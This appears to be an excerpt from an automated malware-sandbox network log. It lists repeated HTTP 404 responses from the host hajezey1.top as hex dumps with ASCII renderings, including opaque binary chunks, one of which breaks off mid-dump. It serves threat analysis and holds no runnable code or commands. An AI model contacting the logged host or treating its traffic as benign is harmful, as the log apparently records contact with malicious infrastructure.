Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 9e 55 06 63 17 e5 ff dc fc be 1e b4 53 d9 63 ba 53 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OUcScS0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 83 28 c8 53 57 5c 29 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 cc ec d2 ca 71 c4 7c be 0c c8 8c 31 f4 d1 98 44 68 38 4b 79 b3 fd ce d5 41 be 53 c9 5c a3 96 52 9b 1f d5 b8 e2 60 1b d6 d6 3d 1b cc c6 84 5b c2 67 7b 0d fc 45 a7 fd 00 72 6f 0e 3b 9a eb 96 06 d9 9a 3c ea d4 28 6a a3 4e 6e ad 0c 0f 59 cf 4c 15 6a c1 a8 a4 02 cb 50 7b 09 6a 86 79 d7 95 e7 05 f5 e1 94 52 e8 59 9b c5 a7 86 38 b4 f2 a7 7c 2b f0 3a cb 8f 8c f5 cf 9b 3b 66 9b 16 b8 eb 1b e5 d7 4a 74 d0 eb d8 07 cd 23 90 78 51 71 a2 8f d2 ee cf 1c e0 02 02 50 08 08 d8 e2 20 a5 19 93 9b 97 4f f3 e0 e4 62 79 00 94 d5 d6 cb 0f 3d 61 19 f7 cb d2 b3 01 92 b4 b9 c1 82 20 59 57 11 5c 7c a3 7b ab ab 09 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 15 67 aa cf 30 c0 7a 9f 06 a2 7f c1 96 98 8b 36 19 19 cb 8a 13 d8 06 0e 45 87 13 7d 6f fd e0 04 89 f9 d4 57 80 90 70 89 f4 25 75 6b de f2 a2 22 48 32 d2 49 